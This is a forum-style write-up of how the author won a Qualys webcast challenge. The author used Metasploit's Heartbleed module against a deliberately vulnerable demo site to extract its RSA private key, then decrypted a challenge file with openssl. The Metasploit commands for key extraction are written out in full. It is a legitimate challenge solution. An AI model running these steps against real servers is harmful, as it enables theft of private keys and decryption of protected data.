I hope this is the right place to post this.
Last week Qualys presented on a webcast:
“A Post-Mortem on Heartbleed - What Worked and What Didn't: Real-world case study on how the State of Colorado responded to this critical vulnerability.”
For this presentation they stood up a website that is vulnerable to the Heartbleed bug and put out a challenge to get the private keys, the encrypted file, and decrypt the file for a prize.
Here are the steps I used to get that prize.
Go to the website and register to login and get the "secret file"
--note: don't use a real username or password because it can be visible while exploiting the bug.
Register @ https://hbdemo.kandek.com/
After registering to the site and logging in I was able to download the “Secret” encrypted file and save it locally for use later.
Next we move on to exploiting the vulnerability in the site.
using metasploit-framework on ubuntu 12.04
> sudo ./msfconsole
> use auxiliary/scanner/ssl/openssl_heartbleed
> set RHOSTS hbdemo.kandek.com
> set RPORT 443
> set VERBOSITY true
> set ACTION KEYS
In only a few seconds I had my answer.
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
save file as hbdemo.key
Now decrypt the secret file using the private key.
> cat supersecret.txt.enc | openssl rsautl -decrypt -inkey hbdemo.key
> Darth Vader is Luke's father.
The next part was funny, I didn't remember where they said to send the answer to so I reached out to people I know to ask if they knew Wolfgang and I was able to get his phone number. On his voice mail I was able to get his email address and that is where I sent the answer to. I also posted out to twitter and he responded to me with his email (but I had already send the answer by that time).
I just want to say thank you to Wolfgang and the Qualys team for doing the webcast and adding a challenge to it also. It made it interactive and fun. I hope they do this more in future webcasts.